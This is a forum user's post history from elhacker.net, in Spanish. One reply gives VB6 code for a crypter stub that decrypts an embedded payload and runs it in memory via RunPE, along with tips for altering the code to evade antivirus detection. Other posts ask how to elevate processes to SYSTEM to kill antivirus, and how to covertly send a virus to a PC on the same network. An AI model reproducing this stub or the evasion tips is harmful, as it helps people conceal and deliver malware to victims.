elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1]
1  Programación / Programación Visual Basic / Re: [VB6] Necesito ayuda con un tema que me tiene rebentao en: 7 Enero 2015, 20:22 pm
Eso no me vale por que el proceso que accede al mio tiene nivel system, y yo lo que quiero es quita el permiso a system y al resto de usuarios de acceder al proceso por eso es mejor, pero no se hacerlo
2  Programación / Programación Visual Basic / Re: Stub en VB 6 en: 29 Diciembre 2014, 20:10 pm
Bueno, el stub es muy sencillo y te recomendare este tutorial:
http://indetectables.net/viewtopic.php?f=8&t=51265

en el cual aprenderas a crear tanto el stub como el cliente

solo tiene que comprender que el stub es lo que ejecuta el encryptado en memoria

y bueno el codigo consta de 5 lineas como mucho sin contar encryptacion y runpe

y solo decir que la encryptacion encrypta el archivo a ejecutar y el runpe lo ejecuta en memoria

y ya solo te queda el llamado main que simplemente cortara por un delimitador el archivo encryptado
de si mismo y lo des encryptara y ejecutara con el runpe

Un pequeño sub main:
Código:
Sub Main()
Dim Ï»•Ø•¶™ As String
Dim ‰±»±»»¾() As String
Dim ™±¾±™•¯ As String
Dim ¢¾¾»€»Ï() As Byte
Open App.Path & "\" & App.EXEName & ".eXe" For Binary As #1
Ï»•Ø•¶™ = Space$(LOF(1))
Get #1, , Ï»•Ø•¶™
Close #1
‰±»±»»¾ = Split(Ï»•Ø•¶™ , "Delimitador")
™±¾±™•¯ = ENCRYPTACION(‰±»±»»¾(1), "PassDeEncryptacion")
¢¾¾»€»Ï = StrConv(™±¾±™•¯, vbFromUnicode)
CALL RUNPE(App.Path & "\" & App.EXEName & ".eXe", ¢¾¾»€»Ï)
End Sub

y ya que preguntas de como modear, de este sub main, lo puedes modear en un segundo cambiando:

App.Path & "\" & App.EXEName & ".eXe" por una alternativa por ej:

Código:
Private Function Alternativa1() as string
dim a as string
dim b as string
dim c as string
dim d as string
a = app.path
b = app.exename
c = "\"
d = ".exe"

if app.path + "\" = app.path then
end
else
Alternativa1 = a+c+b+d
end function

y el Space$(LOF(1))
ese LOF por otra alternativa
como la de sLOF que encontraras por google

Un saludo, espero haber ayudado
3  Programación / Programación Visual Basic / [VB6] Necesito ayuda con un tema que me tiene rebentao en: 29 Diciembre 2014, 19:28 pm
Buenas, y feliz navidad,
vereis tengo un problemilla, y es el siguiente

E leido este tema:
http://foro.elhacker.net/windows/guia_permisos_o_privilegios_de_cuentas_de_usuarios_en_windows_7-t349884.0.html

por completo pero le falta una cosa y es justo la que necesito,

vereis a un proceso se le pueden cambiar los privilegios de los grupos u usuarios, como read, write, etc

y en ese tema solo explican como hacerselo a archivos y carpetas, pero yo necesito hacerselo a un proceso

Desde el process explorer de sysinternals.com puedes hacer esto

pero yo quiero hacerlo desde codigo en vb6

mi idea es denegar el acceso a read y write para proteger el proceso,

con esta protecion bloqueas la lectura de la memoria que es lo que mas me interesa

Porfavor que alguien me ayude llevo horas leyendo y nada...

Un saludo y feliz navidad
4  Seguridad Informática / Hacking / Re: ¿Como hago una intrusion a pc desde android? (estando en red) en: 9 Febrero 2014, 06:27 am
xD cuando digo intrusion es como enviar ese virus de forma oculta y remota
5  Seguridad Informática / Hacking / ¿Como hago una intrusion a pc desde android? (estando en red) en: 8 Febrero 2014, 15:34 pm
Hola a todos, me interesaria saver como hacer una intrusion a pc desde android estando conectado por wifi a la misma red, e estado mirando y no encuentro informacion util. Tambien me interesa hacer intrusion de android a android estando conectado en la misma red.

El que me pueda contestar se lo agradeco, Un saludo a todos, Y adios  ;D
6  Sistemas Operativos / Windows / Re: Mi Windows No Arranca ayuda por favor. en: 27 Julio 2013, 21:52 pm
1.- Esa grafica que es de 1932 ?? ...
2.- Posiblemente se alla quemado algun componente as probado a desmontarlo y porbar otras piezas
3.- Has probado a formatearlo ?

Chao  ;D
7  Sistemas Operativos / Windows / Limite de archivos a abrir es 15 en: 27 Julio 2013, 21:41 pm
Hola que tal como estais queria aceros 1 pequeña pregunta, en windows 7 el limite de archivos a abrir a la vez es de 15 y si selecionamos 20 archivos ya no nos deja abrirlos a la vez, alguna forma de quitar ese limite ya sea desde regedit o simplemente 1 obcion
8  Programación / Programación Visual Basic / Como puedo crear un archivo de dump de un proceso en: 3 Mayo 2013, 05:05 am
Pues quiero hacer el dump de un archivo igual que hace el programa proces explorer
que te da la obcion de hacer un mini dump
como puedo hacer yo un mini dump desde visual basic 6 (O vb.net v10)

Gracias por vuestra atencion
9  Programación / Programación Visual Basic / Re: Elevar a proceso system y bajar a otro a de usuario en: 23 Octubre 2012, 15:25 pm
pero con ese comando lo unico que ago es que sea del usuario que lo ejecute yo lo que quiero esque se ejecute como systema
10  Programación / Programación Visual Basic / Elevar a proceso system y bajar a otro a de usuario en: 20 Octubre 2012, 22:00 pm
Me gustaria saver con Visual Basic 6 como puedo elevar mi proceso u otro proceso a system y tambien como bajar un proceso system a de usuario, esto me servira para el poder cerrar cualquier tipo de proceso ya sea del propio systema un av o lo que sea, ademas de poder eliminar cualquier tipo de archivo este protegido o no
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines